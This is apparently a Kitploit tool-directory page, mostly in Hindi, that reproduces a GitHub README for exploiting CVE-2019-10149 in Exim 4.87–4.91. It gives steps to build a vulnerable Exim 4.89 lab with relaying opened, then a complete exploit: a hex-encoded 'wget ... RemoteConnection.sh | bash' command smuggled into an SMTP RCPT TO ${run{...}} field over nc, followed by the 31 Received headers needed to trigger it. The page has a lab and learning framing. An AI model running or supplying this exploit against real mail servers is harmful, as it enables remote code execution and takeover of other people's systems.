Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2019-10149 — एक असुरक्षित संस्करण के Exim को स्थापित करने और इसके शोषण के निर्देश | Kitploit
उपकरण/GitHubGitHub/darsigovrustam/cve-2019-10149
भेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षाईमेल सुरक्षालैब और अभ्यास
GitHubdarsigovrustam/cve-2019-10149

CVE-2019-10149

एक असुरक्षित संस्करण के Exim को स्थापित करने और इसके शोषण के निर्देश

रिपॉजिटरी देखें
533 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2019-10149 - Exim 4.87 < 4.91

एक संवेदनशील Exim संस्करण स्थापित करने और इसके शोषण के निर्देश Linux Ubuntu 16.04, Exim 4.89 पर परीक्षण किया गया

Exim स्थापना

exim संस्करण 4.89 डाउनलोड करें और निकालें

  • wget https://github.com/Exim/exim/releases/download/exim-4_89/exim-4.89.tar.xz && tar -xvf exim-4.89.tar.xz

निकाले गए फ़ोल्डर में जाएं

  • cd exim-4.89/

आवश्यक कॉन्फ़िग फ़ाइलों की प्रतिलिपि बनाएँ और संशोधित करें

  • sed -e 's,^EXIM_USER. * $,EXIM_USER=exim,' Local/Makefile src/EDITME > Local/Makefile

  • cp exim_monitor/EDITME Local/eximon.conf

exim उपयोगकर्ता और समूह बनाएँ

  • sudo groupadd -g 31 exim

  • sudo useradd -d /dev/null -c "Exim Daemon" -g exim -s /bin/false -u 31 exim

निर्भरताएँ स्थापित करें

  • sudo apt-get update
  • sudo apt-get install -y make build-essential libpcre3-dev libdb-dev libxt-dev libxaw7-dev

exim 4.89 स्थापित करें

  • sudo make install

/usr/exim/configure को संपादित करें ताकि रिलेइंग की अनुमति हो, जिससे हम 7 दिन प्रतीक्षा किए बिना शोषण कर सकें

  • sudo sed -iz 's/domainlist relay_to_domains =/domainlist relay_to_domains = * /' /usr/exim/configure
  • sudo sed -i '/hostlist relay_from_hosts = localhost/c\hostlist relay_from_hosts = 0.0.0.0' /usr/exim/configure
  • sudo sed -i '/require verify = recipient/c#require verify = recipient' /usr/exim/configure

exim को exim उपयोगकर्ता के रूप में चलाएँ

  • sudo -H -u exim /usr/exim/bin/exim -bd -d-receive

शोषण तैयार करना

अपने शेल कमांड को हेक्स में बदलें। उदाहरण:

  • /bin/sh -c “wget https://raw.githubusercontent.com/darsigovrustam/CVE-2019-10149/master/RemoteConnection.sh" -O - | bash
  • \x2Fbin\x2Fsh\t-c\t\x22wget\t\https\x3A\x2F\x2Fraw\x2Egithubusercontent\x2Ecom\x2Fdarsigovrustam\x2FCVE\x2D2019\x2D10149\x2Fmaster\x2FRemoteConnection\x2Esh\t-O\t-\t\x7C\tbash\x22\

उदाहरण के लिए तालिका:

  • \t-c\ = -c
  • \t= space
  • x20 = space
  • x7C = |
  • x2F = /
  • x3A = :
  • x2D = -
  • x3E = >
  • x26 = &
  • x22 = "
  • x2E = .

शोषण का उपयोग

पहले हम सर्वर से कनेक्शन शुरू करने के लिए nc का उपयोग करते हैं।

  • nc 192.168.0.168 25

एक बार कनेक्ट होने के बाद हम HELO कहते हैं।

  • helo localhost
  • (Answer: 250 exim Hello localhost [192.168.0.168])

अगला, हम प्रेषक पता खाली सेट करते हैं।

  • mail from:<>
  • (Answer: 250 OK)

फिर हम पहले बनाए गए पेलोड के साथ प्राप्तकर्ता पता सेट करते हैं, जहाँ दीर्घवृत्त (ellipses) है, अपनी वांछित कमांड डालते हैं: rcpt to:${run{...}}@localhost।

  • rcpt to:<${run{\x2Fbin\x2Fsh\t-c\t\x22wget\t\https\x3A\x2F\x2Fraw\x2Egithubusercontent\x2Ecom\x2Fdarsigovrustam\x2FCVE\x2D2019\x2D10149\x2Fmaster\x2FRemoteConnection\x2Esh\t-O\t-\t\x7C\tbash\x22}}@localhost>
  • (Answer: 250 Accepted)

और अंत में हम पहले DATA टाइप करते हैं, उसके बाद 31 पंक्तियाँ, एक खाली पंक्ति, और एक अवधि (period)।

  • DATA
  • Received: 1
  • Received: 2
  • Received: 3
  • Received: 4
  • Received: 5
  • Received: 6
  • Received: 7
  • Received: 8
  • Received: 9
  • Received: 10
  • Received: 11
  • Received: 12
  • Received: 13
  • Received: 14
  • Received: 15
  • Received: 16
  • Received: 17
  • Received: 18
  • Received: 19
  • Received: 20
  • Received: 21
  • Received: 22
  • Received: 23
  • Received: 24
  • Received: 25
  • Received: 26
  • Received: 27
  • Received: 28
  • Received: 29
  • Received: 30
  • Received: 31
  • .
टूल डाउनलोड करें